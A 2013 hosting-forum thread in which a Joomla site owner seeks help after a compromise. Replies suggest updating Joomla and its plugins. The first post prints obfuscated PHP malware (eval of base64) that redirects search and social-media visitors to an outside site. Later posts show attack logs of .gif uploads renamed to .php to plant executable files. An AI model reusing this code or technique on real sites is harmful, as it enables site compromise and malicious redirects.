Web Hosting
Results 1 to 9 of 9
  1. #1
    Join Date
    Sep 2013
    Posts
    4

    Default Help I have been hacked!

    My site has been hacked and I have had Jhackguard installed. Here is the log file!

    Can you help identify the issue? It looks like the log file may have been hacked to! It starts with this php.




    #
    #<?php eval(base64_decode("/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaC AoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIp IG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3 Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Ig c3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIX N0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIo JHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYX Rpb246IGh0dHA6Ly93d3cuY2lib25saW5lLm9yZy9jYWNoZS9t b2RfcG9sbC83Yzc0NzhmZGUyZjg5YTIzLnBocCIpOw0KCQlleG l0KCk7DQoJfQ0KfQ0KfQ==")); die('Forbidden.'); ?>
    #Date: 2013-08-30 00:33:55 UTC
    #Software: Joomla Platform 11.4.0 Stable [ Brian Kernighan ] 03-Jan-2012 00:00 GMT

  2. #2
    Join Date
    Sep 2013
    Location
    Prague
    Posts
    2

    Default

    Contact your hosting provider and they will give you an assistance.

  3. #3

    Default

    Hi Martsax,

    Could you please keep us informed wether you found a solution ?

    Thanks in advance.

  4. #4
    Join Date
    Sep 2013
    Posts
    4

    Default

    My hosting provider hasn't be able to identify any issues on their side of things. The string in my first post had been added to Joomla configuration.php and 4 files in the libraries directory and the jhackguard log file. Is there anything I can change in Jhackguard to prevent this?

  5. #5

    Default

    The cause of this issue is most probably using an outdated Joomla version or plugin that allows the attacker to compromise your website. This is where you should start looking. Update your installation to the latest stable version and check the plugins (components and modules) you use.

  6. #6
    Join Date
    Sep 2013
    Posts
    4

    Default

    I think I have cleaned out all the infected files now and managed to repel the attacks so far. I had these entries in the logfiles yesterday and nothing since. Do you have any information on how to interpret the logs?


    2013-11-07T07:15:56+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-07T07:15:56+00:00 CRITICAL jhackguard Changed POST value from:ViAr
    -----------------------------41184676334
    Content-Disposition: form-data; name=\"action\"

    upload to:ViAr
    -----------------------------41184676334
    Content-Disposition: form-data; name="action"

    upload
    2013-11-07T07:38:32+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-07T07:38:32+00:00 CRITICAL jhackguard Changed POST value from:ViAr
    -----------------------------41184676334
    Content-Disposition: form-data; name=\"action\"

    upload to:ViAr
    -----------------------------41184676334
    Content-Disposition: form-data; name="action"

    upload
    2013-11-07T08:34:58+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-07T08:34:58+00:00 CRITICAL jhackguard Changed POST value from:ViAr
    -----------------------------41184676334
    Content-Disposition: form-data; name=\"action\"

    upload to:ViAr
    -----------------------------41184676334
    Content-Disposition: form-data; name="action"

    upload

  7. #7

    Default

    This means that someone is first uploading a .gif file than trying to change its name to .php, therefore making it executable. This is certainly an attempt to compromise your website.

  8. #8
    Join Date
    Sep 2013
    Posts
    4

    Default

    I have since had this reports from Jhackguard. Is it repelling the attack?

    2013-11-08T12:13:48+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/iam.gif\",\"localhost.php\"]} to:{"fn":"folderRename","args":["/iam.gif","localhost.php"]}
    2013-11-08T12:14:07+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/iam.gif\",\"localhost.php\"]} to:{"fn":"folderRename","args":["/iam.gif","localhost.php"]}
    2013-11-09T14:40:57+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T14:40:57+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T15:15:22+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T15:15:22+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T15:18:47+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T17:29:33+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T17:29:33+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T17:50:28+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T17:50:33+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-10T06:47:52+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/config.inc.gif\",\"config.inc.php\"]} to:{"fn":"folderRename","args":["/config.inc.gif","config.inc.php"]}
    2013-11-10T06:47:53+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/config.inc.gif\",\"config.inc.php\"]} to:{"fn":"folderRename","args":["/config.inc.gif","config.inc.php"]}

  9. #9

    Default

    Yes, but I would still advise you to consider immediately upgrading your Joomla installations along with all plugins you are using, verify their integrity and thoroughly scan your website for exploits.

Similar Threads

  1. Hacked
    By yourteacher in forum General Joomla Discussions
    Replies: 1
    Last Post: 11-15-2009, 11:02 AM
  2. sites hacked...
    By arent in forum Forum Applications
    Replies: 5
    Last Post: 05-02-2008, 04:50 AM
  3. My site got hacked!
    By Shadow_Guyver in forum Other Software and Applications
    Replies: 1
    Last Post: 04-21-2008, 05:04 AM
  4. Site hacked?
    By twiggystardust in forum Forum Applications
    Replies: 1
    Last Post: 10-17-2007, 03:26 AM
  5. Hacked Site
    By HUKO in forum General Joomla Discussions
    Replies: 3
    Last Post: 04-17-2006, 10:30 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •